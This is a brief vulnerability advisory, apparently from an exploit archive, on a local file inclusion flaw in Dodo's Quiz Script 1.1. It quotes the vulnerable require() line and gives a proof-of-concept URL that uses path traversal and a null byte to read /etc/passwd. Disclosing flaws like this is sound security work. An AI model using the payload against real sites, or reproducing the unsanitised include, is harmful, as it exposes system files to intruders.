Dodo's Quiz Script version 1.1 suffers from a local file inclusion vulnerability in dodosquiz.php.
ab94a979e7893e7229ec8d733242d1bc73edc9ee00fccbe569470ca1dd5cc570
Dodo's Quiz Script 1.1 (dodosquiz.php) Local File Inclusion Vulnerability
Discovered by cOndemned
Greetz: str0ke, sid.psycho & TWT, Alfons Luja
Download : http://regretless.com/scripts/dodosdownload.php?action=download&n=1
source of dodosquiz.php:
[ ... ]
25. if(!$_GET['n'])
26. exit;
27. require("quiz_".$_GET['n'].".php"); # lfi
[ ... ]
proof of concept:
http://[host]/[dodos_quiz_path]/dodosquiz.php?n=/../../../../etc/passwd%00